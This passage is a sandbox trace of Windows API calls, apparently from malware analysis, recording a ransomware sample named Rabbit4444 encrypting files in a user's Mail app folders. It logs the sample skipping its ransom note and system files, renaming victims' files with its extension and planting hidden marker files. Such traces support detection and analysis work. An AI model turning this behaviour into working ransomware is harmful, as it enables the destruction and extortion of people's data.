lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0063.693] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15500401547) returned 1 [0063.693] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16384) returned 1 [0063.693] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0063.693] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0063.693] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4300, lpName=0x0) returned 0x2a0 [0063.694] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4300) returned 0x70000 [0063.697] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123760 [0063.697] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0063.697] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0063.697] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0063.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0063.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0063.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0063.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0063.698] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15500863865) returned 1 [0063.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0063.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0063.698] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.698] CloseHandle (hObject=0x2a0) returned 1 [0063.698] CloseHandle (hObject=0x278) returned 1 [0063.698] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444") returned 126 [0063.698] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0063.699] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xeaed6ff3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xeaed6ff3, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xeaed6ff3, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0063.699] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.699] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.699] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0063.699] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0063.699] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0063.699] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0063.699] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0063.699] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0063.699] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0063.699] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0063.700] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0063.700] lstrcpyW (in: lpString1=0x130ebfc, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0063.700] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0063.700] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0063.700] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0063.700] lstrlenW (lpString="Rabbit4444") returned 10 [0063.700] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0063.700] lstrlenW (lpString=".dll") returned 4 [0063.700] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0063.700] lstrlenW (lpString=".lnk") returned 4 [0063.700] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0063.700] lstrlenW (lpString=".ini") returned 4 [0063.700] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0063.700] lstrlenW (lpString=".sys") returned 4 [0063.700] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0063.700] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xeaed6ff3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xeaed6ff3, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xeaed6ff3, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0063.700] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0063.700] lstrcpyW (in: lpString1=0x130ebfc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.700] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.701] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.701] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.702] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.702] CloseHandle (hObject=0x278) returned 1 [0063.702] CloseHandle (hObject=0x298) returned 1 [0063.702] GetCurrentThreadId () returned 0xd98 [0063.702] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0063.702] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState" [0063.702] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108760 | out: hHeap=0xe0000) returned 1 [0063.702] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0063.703] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState" [0063.703] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState\\" [0063.703] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" [0063.703] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.704] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.706] FlushFileBuffers (hFile=0x298) returned 1 [0063.707] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.708] CloseHandle (hObject=0x298) returned 1 [0063.708] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState") returned 101 [0063.708] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.708] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd192c093, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef4b3480, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0063.708] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.708] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.708] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.708] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.708] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd192c093, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef4b3480, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.708] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.708] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.708] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.708] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.709] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.709] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef4b3480, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef4b3480, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef4b3480, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.709] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.709] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.709] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef4b3480, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef4b3480, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef4b3480, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.709] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0063.712] lstrcpyW (in: lpString1=0x130ec04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.712] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.713] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.713] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.714] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.714] CloseHandle (hObject=0x278) returned 1 [0063.714] CloseHandle (hObject=0x298) returned 1 [0063.714] GetCurrentThreadId () returned 0xd98 [0063.714] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fa8 [0063.714] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState" [0063.714] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116ad0 | out: hHeap=0xe0000) returned 1 [0063.714] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fa0 | out: hHeap=0xe0000) returned 1 [0063.714] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState" [0063.714] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\" [0063.714] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" [0063.714] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.716] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.719] FlushFileBuffers (hFile=0x298) returned 1 [0063.720] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.720] CloseHandle (hObject=0x298) returned 1 [0063.720] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState") returned 99 [0063.720] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.720] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x2f23f1b3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xef4d60c2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0063.721] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.721] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.721] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.721] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.721] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x2f23f1b3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xef4d60c2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.721] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.721] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.721] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.721] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.721] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.721] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef4d60c2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef4d60c2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef4d60c2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.721] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.721] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.721] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f13411f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f13411f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2f13411f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Files", cAlternateFileName="")) returned 1 [0063.721] lstrcmpiW (lpString1="Files", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.721] lstrcmpiW (lpString1="Files", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.721] lstrcmpiW (lpString1="Files", lpString2="Rabbit4444.exe") returned -1 [0063.721] lstrcmpiW (lpString1="Files", lpString2=".") returned 1 [0063.721] lstrcmpiW (lpString1="Files", lpString2="..") returned 1 [0063.721] lstrcmpiW (lpString1="Files", lpString2="windows") returned -1 [0063.721] lstrcmpiW (lpString1="Files", lpString2="bootmgr") returned 1 [0063.721] lstrcmpiW (lpString1="Files", lpString2="pagefile.sys") returned -1 [0063.721] lstrcmpiW (lpString1="Files", lpString2="boot") returned 1 [0063.721] lstrcmpiW (lpString1="Files", lpString2="ids.txt") returned -1 [0063.721] lstrcmpiW (lpString1="Files", lpString2="NTUSER.DAT") returned -1 [0063.721] lstrcpyW (in: lpString1=0x130ec00, lpString2="Files" | out: lpString1="Files") returned="Files" [0063.721] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221e0 [0063.721] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd4) returned 0x123760 [0063.721] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221e8 | out: ListHead=0xf68b0, ListEntry=0x1221e8) returned 0x1222a8 [0063.721] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d91a174, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7c5433fc, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa8a3775d, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HxStore.hxd", cAlternateFileName="")) returned 1 [0063.722] lstrcmpiW (lpString1="HxStore.hxd", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.722] lstrcmpiW (lpString1="HxStore.hxd", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.722] lstrcmpiW (lpString1="HxStore.hxd", lpString2="Rabbit4444.exe") returned -1 [0063.722] lstrcmpiW (lpString1="HxStore.hxd", lpString2=".") returned 1 [0063.722] lstrcmpiW (lpString1="HxStore.hxd", lpString2="..") returned 1 [0063.722] lstrcmpiW (lpString1="HxStore.hxd", lpString2="windows") returned -1 [0063.722] lstrcmpiW (lpString1="HxStore.hxd", lpString2="bootmgr") returned 1 [0063.722] lstrcmpiW (lpString1="HxStore.hxd", lpString2="pagefile.sys") returned -1 [0063.722] lstrcmpiW (lpString1="HxStore.hxd", lpString2="boot") returned 1 [0063.722] lstrcmpiW (lpString1="HxStore.hxd", lpString2="ids.txt") returned -1 [0063.722] lstrcmpiW (lpString1="HxStore.hxd", lpString2="NTUSER.DAT") returned -1 [0063.722] lstrcpyW (in: lpString1=0x130ec00, lpString2="HxStore.hxd" | out: lpString1="HxStore.hxd") returned="HxStore.hxd" [0063.722] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\HxStore.hxd", dwFileAttributes=0x0) returned 1 [0063.723] lstrlenW (lpString="HxStore.hxd") returned 11 [0063.723] lstrlenW (lpString="Rabbit4444") returned 10 [0063.723] lstrcmpiW (lpString1="xStore.hxd", lpString2="Rabbit4444") returned 1 [0063.723] lstrlenW (lpString=".dll") returned 4 [0063.723] lstrcmpiW (lpString1=".hxd", lpString2=".dll") returned 1 [0063.723] lstrlenW (lpString=".lnk") returned 4 [0063.723] lstrcmpiW (lpString1=".hxd", lpString2=".lnk") returned -1 [0063.723] lstrlenW (lpString=".ini") returned 4 [0063.724] lstrcmpiW (lpString1=".hxd", lpString2=".ini") returned -1 [0063.724] lstrlenW (lpString=".sys") returned 4 [0063.724] lstrcmpiW (lpString1=".hxd", lpString2=".sys") returned -1 [0063.724] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\HxStore.hxd" (normalized: 